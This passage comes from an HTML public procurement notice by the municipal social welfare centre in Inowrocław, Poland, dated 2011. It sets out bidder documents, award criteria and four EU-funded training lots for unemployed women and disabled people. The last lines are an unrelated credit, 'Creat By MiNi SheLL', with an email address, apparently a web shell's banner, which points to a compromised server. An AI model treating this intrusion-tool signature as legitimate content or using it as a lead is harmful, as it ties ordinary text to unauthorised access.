<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Załącznik nr 1 - formularz ofertowy. 
b) Załącznik nr 8 - kalkulacja kosztów szkolenia.
c) Załącznik nr 9 - opis warunków lokalowych i wyposażenia.
d) Załącznik nr 10 - doświadczenie Wykonawcy w organizowaniu  szkoleń/warsztatów/kursów odpowiadających tematyką zakresowi tematycznemu objętemu niniejszym zamówieniem. 
e) Załącznik nr 11 -  Opis programów oferowanych szkoleń z uwzględnieniem zakresu przedmiotu zamówienia i wymagań Zamawiającego.
f) Załącznik nr 12 -  pisemne zobowiązanie podmiotu do udostępnienia Wykonawcy wiedzy i doświadczenia, osób zdolnych do wykonania zamówienia h na okres korzystania z nich przy wykonaniu zamówienia - jeśli dotyczy.
g) dokument lub dokumenty, z których będzie  wynikać uprawnienie osób/y do podpisania oferty, np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki lub aktualny rejestr handlowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - doświadczenie wykonawcy - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w następujących przypadkach:
a)zamawiający zastrzega zgodnie z art.145 ustawy, iż w razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości o tych okolicznościach;
b) zmiany ilości uczestników szkoleń, w przypadku przerwania lub zakończenia przez uczestnika udziału w projekcie. W ww. przypadku  pomniejsza się cenę  brutto za zakładaną/szacunkową ilość osób/uczestników o koszty  za osobę/y, które przerwały lub zakończyły udział w projekcie. Zamawiający zapłaci za osoby, które ukończyły szkolenia;
c) zmiany terminów wykonania szkoleń, z przyczyn nieleżących po stronie Wykonawcy;
d) zmiany miejsca prowadzenia zajęć szkoleń, z przyczyn niezależnych od Wykonawcy (np. wypowiedzenie umowy najmu użyczenia lokalu, powódź). Przy czym nowe pomieszczenie/a muszą znajdować się w Ino-wrocławiu  i spełniać wszystkie wymagane przez Zamawiającego warunki;

e) zmiany harmonogramów w uzasadnionych przypadkach;
f) zmiany osób przeprowadzających szkolenie w uzasadnionych wypadkach, z tym, że inne osoby nie mogą posiadać  niższych kwalifikacji.
g) zmiany programów szkoleń, w uzasadnionych przypadkach.
Warunkiem wprowadzenia ww. zmian będzie pisemne uzasadnienie wprowadzenia ww. zmian. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron w formie pisemnej zastrzeżonej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopsinowroclaw.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy społecznej 
ul. Św. Ducha 90
88-100 Inowrocław
pokój nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.10.2011 godzina 13:45, miejsce: Miejski Ośrodek Pomocy społecznej 
ul. Św. Ducha 90
88-100 Inowrocław
pokój nr 11.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane jest ze środków Unii Europejskiej w ramach  Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening wychowawczy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych
na szkolenie Trening wychowawczy. Ilość osób do przeszkolenia/ ilość grup. Informacja o uczestnikach szkolenia
(Zamawiający przewiduje możliwość zmiany ilości uczestników szkolenia w przypadku przerwania lub zakończenia
udziału w projekcie.): 39 kobiet bezrobotnych i ich dzieci. Zajęcia będą prowadzone w dwóch grupach: jednej-19 osobowej (19 kobiet) i drugiej-20 osobowej (20 kobiet). Liczba dzieci uczestniczących w zajęciach zostanie
określona podczas trwania szkolenia. Liczba godzin dla grupy szkoleniowej: 25 godzin lekcyjnych dla każdej z
grup (łącznie 50 godzin lekcyjnych), w tym 20 godzin dla kobiet bezrobotnych i 5 godzin (ostatni dzień zajęć) dla
kobiet bezrobotnych i ich dzieci. Terminy zajęć: 9, 10, 14, 15, 16 listopada 2011 roku. Ramowy program
szkolenia. Cel warsztatów: podniesienie umiejętności wychowawczych uczestniczek poprzez naukę organizowania
i spędzania z dziećmi czasu wolnego, zacieśnienie więzi rodzinnych. Miejsce szkolenia: Inowrocław (łatwy dojazd
środkami komunikacji miejskiej z różnych części miasta). Prowadzący szkolenie: co najmniej 2 wykładowców/prowadzących na grupę. Materiały dydaktyczne a) materiały niezbędne do realizacji szkolenia, b)
dla wszystkich uczestników szkolenia (tylko kobiet) oraz jeden komplet dla Zamawiającego na potrzeby
dokumentacji projektowej: -materiały szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane
bezpłatnie, -materiały w formie papierowej zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są
one dystrybuowane bezpłatnie, -notatnik i długopis, teczka z rączką, format A4, laminat błyszczący, - gra
edukacyjna związana z tematyką szkolenia, np. Opowiem Ci, Mamo, Prawda czy fałsz? Wykonawca musi
dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. materiałów Działania
promocyjne: Wizualizacja kursów zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego
Kapitał Ludzki (PO KL), które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do
informowania, że szkolenie organizowane jest w ramach projektu systemowego Miejskiego Ośrodka Pomocy
Społecznej w Inowrocławiu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Dystrybucja materiałów szkoleniowych wśród uczestników szkolenia. Zaświadczenia Wykonawca wydrukuje i wyda
w dniu ukończenia szkolenia wszystkim uczestnikom zaświadczenia imienne o ukończeniu szkolenia z
wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór
zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć
Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia.
Sale dydaktyczne z oknami zapewniającymi światło dzienne i
wietrzenie, z możliwością indywidualnej aranżacji, wyposażone, w: - miejsca siedzące dla wszystkich uczestników
szkolenia, - niezbędne materiały potrzebne do realizacji szkolenia Usługa gastronomiczna: Wykonawca zapewni
usługę gastronomiczną podczas kursów składającą się z bufetu kawowego, w przerwach między zajęciami,
składającego się z co najmniej: -kawa czarna dla każdego uczestnika, ze stosownymi dodatkami, o których mowa
poniżej, -herbata czarna oraz wrzątek w termosach, -cukier, śmietanka do kawy, cytryna do herbaty dla
wszystkich uczestników -ciastka kruche minimum 20 dag, na osobę dziennie, -kostka ciastka lub drożdżówka lub
inne ciastko na osobę dziennie, -Zamawiający nie wyklucza jednak, że uczestnicy mogą mieć częstszy dostęp do ww. bufetu, np. gdy takowy znajduje się na końcu sali, gdzie odbywają się zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Indywidualne konsultacje pedagogiczne..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem
zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem
materiałów szkoleniowych na szkolenie Indywidualne konsultacje pedagogiczne. -Ilość osób do przeszkolenia/
ilość grup . Informacja o uczestnikach szkolenia (Zamawiający przewiduje możliwość zmiany ilości uczestników
szkolenia w przypadku przerwania lub zakończenia udziału w projekcie.).Liczba godzin dla grupy szkoleniowej.
Terminy zajęć. :47 osób niepełnosprawnych (w stopniu lekkim i umiarkowanym) w ilości 4 godziny lekcyjne na
osobę (łącznie 188 godzin lekcyjnych) w terminie: 17, 18, 21, 22 listopada 2011 r. Wśród uczestników nie ma
osób poruszających się na wózkach inwalidzkich, niewidomych i głuchoniemych. Ramowy program szkolenia:
Celem konsultacji jest zdobycie umiejętności komunikowania się i rozwiązywania problemów (także tych
związanych z własną niepełnosprawnością) poprzez zmotywowanie uczestniczek i uczestników do rozwoju
własnych pasji i zainteresowań. Miejsce szkolenia: Inowrocław (łatwy dojazd środkami komunikacji miejskiej z
różnych części miasta). Prowadzący szkolenia: co najmniej 4 prowadzących indywidualne konsultacje
pedagogiczne Materiały dydaktyczne: a) materiały niezbędne do realizacji szkolenia, b) dla wszystkich
uczestników szkolenia oraz jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej: -materiały
szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane bezpłatnie. -materiały w formie papierowej
zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, -notatnik i długopis, teczka z rączką, format A4, laminat błyszczący. Wykonawca musi dostarczyć Zamawiającemu pisemne
potwierdzenia odbioru przez uczestników ww. materiałów. Działania promocyjne: Wizualizacja szkolenia zgodnie z
wytycznymi w zakresie informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL), które są dostępne
pod adresem www.efs.gov.pl .Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest w
ramach projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków Unii
Europejskiej w ramach Europejskiego Funduszu Społecznego. Dystrybucja materiałów szkoleniowych wśród
uczestników szkolenia. Zaświadczenia: Wykonawca wydrukuje i wyda w dniu ukończenia szkolenia wszystkim
uczestnikom zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu
poruszanych zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany
przez Zamawiającego. Wykonawca musi dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez
uczestników ww. zaświadczenia.
Sale dydaktyczne z oknami zapewniającymi światło dzienne i
wietrzenie, z możliwością indywidualnej aranżacji, wyposażone, w: - miejsca siedzące dla wszystkich uczestników
szkolenia, - niezbędne materiały potrzebne do realizacji szkolenia Usługa gastronomiczna: Wykonawca zapewni
usługę gastronomiczną podczas kursów składającą się z bufetu kawowego, w przerwach między zajęciami,
składającego się z co najmniej: -kawa czarna dla każdego uczestnika, ze stosownymi dodatkami, o których mowa
poniżej, -herbata czarna oraz wrzątek w termosach, -cukier, śmietanka do kawy, cytryna do herbaty dla
wszystkich uczestników -ciastka kruche minimum 20 dag, na osobę dziennie, -kostka ciastka lub drożdżówka lub inne ciastko na osobę dziennie, -Zamawiający nie wyklucza jednak, że uczestnicy mogą mieć częstszy dostęp do
ww. bufetu, np. gdy takowy znajduje się na końcu sali, gdzie odbywają się zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 17.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Warsztaty prawnicze z elementami edukacji obywatelskiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie kompleksowej usługi
szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych na szkolenie Warsztaty
prawnicze z elementami edukacji obywatelskiej. Ilość osób do przeszkolenia/ ilość grup . Informacja o
uczestnikach szkolenia (Zamawiający przewiduje możliwość zmiany ilości uczestników szkolenia w przypadku
przerwania lub zakończenia udziału w projekcie.). Liczba godzin dla grupy szkoleniowej.Terminy zajęć:Warsztaty
prawnicze z elementami edukacji obywatelskiej dla jednej grupy 16 kobiet bezrobotnych (wychowujących
dziecko/dzieci niepełnosprawne) w ilości 20 godzin lekcyjnych. Termin warsztatów: 9, 10, 14, 15, 16 listopada
2011 roku. Ramowy program szkolenia: Cel warsztatów: zapoznanie uczestniczek z prawami obywatelskimi, w
tym oddolnymi inicjatywami obywateli (podstawy prawne dot. założenia fundacji, stowarzyszenia, spółdzielni
socjalnej itp.) oraz aktami prawnymi związanymi z niepełnosprawnością dziecka. Zajęcia muszą uwzględniać
wizytę studyjną, którą należy uwzględnić w złożonym opisie programów. Miejsce szkolenia: Inowrocław (łatwy
dojazd środkami komunikacji miejskiej z różnych części miasta) Prowadzący szkolenia: co najmniej 1 wykładowca
na grupę. Materiały dydaktyczne: a) materiały niezbędne do realizacji szkolenia, b) dla wszystkich uczestników
szkolenia oraz jeden komplet dla Zamawiającego na potrzeby dokumentacji projektowej: -materiały szkoleniowe
na płycie CD, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, -materiały w formie papierowej
zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są one dystrybuowane bezpłatnie, -notatnik i
długopis, teczka z rączką, format A4, laminat błyszczący, - książka z zakresu tematyki zajęć. Wykonawca musi
dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. materiałów. Działania
promocyjne: Wizualizacja kursów zgodnie z wytycznymi w zakresie informacji i promocji Programu Operacyjnego
Kapitał Ludzki (PO KL), które są dostępne pod adresem www.efs.gov.pl. Wykonawca zobowiązany jest do
informowania, że szkolenie organizowane jest w ramach projektu systemowego Miejskiego Ośrodka Pomocy
Społecznej w Inowrocławiu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.
Dystrybucja materiałów szkoleniowych wśród uczestników szkolenia. Zaświadczenia: Wykonawca wydrukuje i
wyda w dniu ukończenia szkolenia wszystkim uczestnikom zaświadczenia imienne o ukończeniu szkolenia z
wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych umiejętności. Wzór
zaświadczenia powinien zostać zaakceptowany przez Zamawiającego. Wykonawca musi dostarczyć
Zamawiającemu pisemne potwierdzenia odbioru przez uczestników ww. zaświadczenia.
Sale dydaktyczne z oknami zapewniającymi światło dzienne i
wietrzenie, z możliwością indywidualnej aranżacji, wyposażone, w: - miejsca siedzące dla wszystkich uczestników
szkolenia, - niezbędne materiały potrzebne do realizacji szkolenia Usługa gastronomiczna: Wykonawca zapewni
usługę gastronomiczną podczas kursów składającą się z bufetu kawowego, w przerwach między zajęciami,
składającego się z co najmniej: -kawa czarna dla każdego uczestnika, ze stosownymi dodatkami, o których mowa
poniżej, -herbata czarna oraz wrzątek w termosach, -cukier, śmietanka do kawy, cytryna do herbaty dla
wszystkich uczestników -ciastka kruche minimum 20 dag, na osobę dziennie, -kostka ciastka lub drożdżówka lub
inne ciastko na osobę dziennie, -Zamawiający nie wyklucza jednak, że uczestnicy mogą mieć częstszy dostęp do ww. bufetu, np. gdy takowy znajduje się na końcu sali, gdzie odbywają się zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warsztaty kreowania własnego wizerunku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem
zamówienia jest wykonanie kompleksowej usługi szkoleniowej i gastronomicznej wraz z przygotowaniem materiałów szkoleniowych na szkolenie Warsztaty kreowania własnego wizerunku. Ilość osób do przeszkolenia/
ilość grup . Informacja o uczestnikach szkolenia (Zamawiający przewiduje możliwość zmiany ilości uczestników
szkolenia w przypadku przerwania lub zakończenia udziału w projekcie.).Liczba godzin dla grupy szkoleniowej.
Terminy zajęć: Warsztaty kreowania własnego wizerunku dla 47 osób niepełnosprawnych w ilości 100 godzin
lekcyjnych, z czego: 1. Pierwsze 75 godzin zajęć będzie się odbywać w następujących grupach: a) Grupa A - 6
kobiet i 7 mężczyzn z lekkim stopniem niepełnosprawności - 25 godzin lekcyjnych, b) Grupa B - 9 kobiet i 8
mężczyzn z umiarkowanym stopniem niepełnosprawności - 25 godzin lekcyjnych, c) Grupa C - 8 kobiet i 9
mężczyzn z umiarkowanym stopniem niepełnosprawności - 25 godzin lekcyjnych. 2. Pozostałe 25 godzin zajęć
będzie się odbywać w następujących grupach: a) Grupa 24 mężczyzn z grup A, B i C - 5 godzin lekcyjnych, b)
Grupa 23 kobiet z grup A, B i C - 20 godzin lekcyjnych. Wśród uczestników nie ma osób poruszających się na
wózkach inwalidzkich, niewidomych i głuchoniemych. Termin zajęć: 9, 10, 14, 15, 16, 17, 18 listopada 2011 roku
Ramowy program szkolenia: Celem warsztatów jest m.in. wzmocnienie poczucia atrakcyjności uczestników
poprzez dbałość o swój wygląd i higienę oraz poznanie zasad savoir - vivre, doskonalenie umiejętności
społecznych. Miejsce szkolenia Inowrocław (łatwy dojazd środkami komunikacji miejskiej z różnych części miasta)
Prowadzący szkolenia: co najmniej 3 wykładowców Materiały dydaktyczne: a) materiały niezbędne do realizacji
szkolenia, b) dla wszystkich uczestników szkolenia oraz jeden komplet dla Zamawiającego na potrzeby
dokumentacji projektowej: -materiały szkoleniowe na płycie CD, z zaznaczeniem, iż są one dystrybuowane
bezpłatnie, -materiały w formie papierowej zaakceptowane wcześniej przez Zamawiającego, z zaznaczeniem, iż są
one dystrybuowane bezpłatnie, -notatnik i długopis, teczka z rączką, format A4, laminat błyszczący, - książka z
zakresu tematyki zajęć. Wykonawca musi dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez
uczestników ww. materiałów. Działania promocyjne: Wizualizacja kursów zgodnie z wytycznymi w zakresie
informacji i promocji Programu Operacyjnego Kapitał Ludzki (PO KL), które są dostępne pod adresem
www.efs.gov.pl. Wykonawca zobowiązany jest do informowania, że szkolenie organizowane jest w ramach
projektu systemowego Miejskiego Ośrodka Pomocy Społecznej w Inowrocławiu ze środków Unii Europejskiej w
ramach Europejskiego Funduszu Społecznego. Dystrybucja materiałów szkoleniowych wśród uczestników
szkolenia. Zaświadczenia: Wykonawca wydrukuje i wyda w dniu ukończenia szkolenia wszystkim uczestnikom
zaświadczenia imienne o ukończeniu szkolenia z wyszczególnieniem liczby godzin, zakresu poruszanych
zagadnień oraz doskonalonych umiejętności. Wzór zaświadczenia powinien zostać zaakceptowany przez
Zamawiającego. Wykonawca musi dostarczyć Zamawiającemu pisemne potwierdzenia odbioru przez uczestników
ww. zaświadczenia.
Sale dydaktyczne z oknami zapewniającymi światło dzienne i
wietrzenie, z możliwością indywidualnej aranżacji, wyposażone, w: - miejsca siedzące dla wszystkich uczestników
szkolenia, - niezbędne materiały potrzebne do realizacji szkolenia Usługa gastronomiczna: Wykonawca zapewni
usługę gastronomiczną podczas kursów składającą się z bufetu kawowego, w przerwach między zajęciami,
składającego się z co najmniej: -kawa czarna dla każdego uczestnika, ze stosownymi dodatkami, o których mowa
poniżej, -herbata czarna oraz wrzątek w termosach, -cukier, śmietanka do kawy, cytryna do herbaty dla
wszystkich uczestników -ciastka kruche minimum 20 dag, na osobę dziennie, -kostka ciastka lub drożdżówka lub
inne ciastko na osobę dziennie, -Zamawiający nie wyklucza jednak, że uczestnicy mogą mieć częstszy dostęp do ww. bufetu, np. gdy takowy znajduje się na końcu sali, gdzie odbywają się zajęcia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.52.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 09.11.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. doświadczenie wykonawcy - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com